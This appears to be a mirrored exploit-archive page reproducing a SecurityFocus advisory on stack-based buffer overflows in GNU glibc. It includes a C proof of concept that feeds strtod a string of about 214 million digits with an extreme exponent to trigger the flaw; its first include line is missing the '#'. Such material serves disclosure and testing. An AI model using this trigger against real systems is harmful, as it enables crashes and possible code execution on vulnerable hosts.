扫码分享
验证:
体验盒子// source: https://www.securityfocus.com/bid/54982/info
GNU glibc is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data.
Local attackers can exploit these issues to run arbitrary code with privileges of the affected application. Failed exploit attempts can result in a denial-of-service condition.
include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define EXPONENT "e-2147483649"
#define SIZE 214748364
int
main (void)
{
char *p = malloc (1 + SIZE + sizeof (EXPONENT));
if (p == NULL)
{
perror ("malloc");
exit (EXIT_FAILURE);
}
p[0] = '1';
memset (p + 1, '0', SIZE);
memcpy (p + 1 + SIZE, EXPONENT, sizeof (EXPONENT));
double d = strtod (p, NULL);
printf ("%a\n", d);
exit (EXIT_SUCCESS);
}
体验盒子
